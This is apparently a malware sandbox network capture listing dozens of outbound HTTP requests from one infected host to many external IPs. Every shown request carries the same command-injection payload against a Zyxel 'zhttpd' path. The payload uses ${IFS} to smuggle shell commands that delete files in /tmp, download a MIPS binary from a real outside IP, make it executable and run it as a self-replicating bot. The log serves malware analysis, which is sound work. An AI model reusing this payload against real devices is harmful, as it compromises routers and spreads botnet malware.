                                                Jan 29, 2024 07:07:28.991499901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                587192.168.2.2338152117.202.35.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991549015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                588192.168.2.234931295.164.218.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991585970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                589192.168.2.2345136199.47.168.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991628885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                590192.168.2.2334636168.204.171.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991667032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                591192.168.2.233837623.24.114.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991703033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                592192.168.2.2340450119.138.187.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991760015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                593192.168.2.233736271.7.27.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991784096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                594192.168.2.233578478.194.226.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991832018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                595192.168.2.235574020.11.61.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991852045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                596192.168.2.234713081.152.231.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991894960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                597192.168.2.2346342188.192.247.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991920948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                598192.168.2.2346178170.186.12.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991980076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                599192.168.2.234913663.138.35.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992012978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                600192.168.2.2350020179.117.187.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992060900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                601192.168.2.2342796142.124.124.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992093086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                602192.168.2.2339328124.9.86.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992124081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                603192.168.2.2342298124.227.207.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992160082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                604192.168.2.2354374195.62.247.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992201090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                605192.168.2.2339232115.20.149.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992219925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                606192.168.2.2352328217.217.107.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992252111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                607192.168.2.234161847.83.138.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992270947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                608192.168.2.234576625.19.82.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992355108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                609192.168.2.235013271.157.111.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992393970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                610192.168.2.2349214144.59.26.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992451906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                611192.168.2.2343038141.144.225.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992453098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                612192.168.2.2355048141.35.113.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992491007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                613192.168.2.2334478165.248.34.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992547989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                614192.168.2.2335248139.185.167.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992592096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                615192.168.2.233999625.42.108.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992644072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                616192.168.2.2349332188.171.238.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992660046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                617192.168.2.2356728109.111.115.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992726088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                618192.168.2.2353836159.181.217.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992778063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                619192.168.2.234574849.67.62.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992815971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                620192.168.2.2338022208.250.70.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992870092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                621192.168.2.2348536186.232.164.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992904902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                622192.168.2.233821094.57.58.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992944956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                623192.168.2.2344470181.203.35.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.992974043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                624192.168.2.2346106221.43.159.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993010998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                625192.168.2.2347828171.128.119.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993043900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                626192.168.2.2360292192.224.182.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993077040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                627192.168.2.2358914155.43.88.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993103027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                628192.168.2.2340124206.68.113.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993159056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                629192.168.2.2338260168.53.37.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993191004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                630192.168.2.2349968202.186.223.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993242979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                631192.168.2.235944297.250.179.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993271112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                632192.168.2.2342098180.254.19.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993324041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                633192.168.2.235113632.60.32.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993356943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                634192.168.2.2350632133.195.254.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993407965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                635192.168.2.2354380111.200.100.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993443966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                636192.168.2.234574470.200.171.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993485928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                637192.168.2.2338106164.116.142.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993524075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                638192.168.2.2335104216.33.203.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993541002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                639192.168.2.2350764182.173.241.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993592978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                640192.168.2.2333858100.51.62.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993622065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                641192.168.2.2339540198.148.159.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993649960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                642192.168.2.2352580152.227.140.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993702888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                643192.168.2.2341526194.37.214.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993752003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                644192.168.2.233678081.110.26.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993772984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                645192.168.2.2350822140.90.179.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993815899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                646192.168.2.235801695.230.89.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993846893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                647192.168.2.23463581.156.117.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993880987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                648192.168.2.2353120190.247.97.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993904114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                649192.168.2.235580212.83.22.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.993933916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                650192.168.2.2350680166.150.192.42443
                                                TimestampBytes transferredDirectionData
